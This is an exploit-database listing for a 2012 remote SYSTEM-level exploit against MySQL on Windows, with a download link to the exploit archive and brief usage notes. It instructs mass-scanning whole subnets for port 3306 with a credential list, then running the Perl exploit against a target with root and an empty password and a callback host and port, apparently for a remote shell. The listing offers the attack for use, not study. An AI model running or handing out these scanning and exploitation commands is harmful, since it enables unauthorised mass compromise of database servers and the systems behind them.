MySQL Windows Remote System Level Exploit (Stuxnet technique) (0day)

EDB-ID: 23083 CVE: N/A OSVDB-ID: N/A
Verified: Author: kingcope Published: 2012-12-02
Download Exploit: Source Raw Download Vulnerable App: N/A
MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit
Version 1.0
By Kingcope
In the Year of 2012

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23083.zip

use this on a fast scan server!

How to use.
pnscan:

the file "accounts" holds the user/password combinations to try.
hits are saved in the file "jack.pot".

#make lnx
#./pnscan 192.168.0.0/16 3306

exploit:
#perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555

user root on windows will mostly succeed.

/Kingcope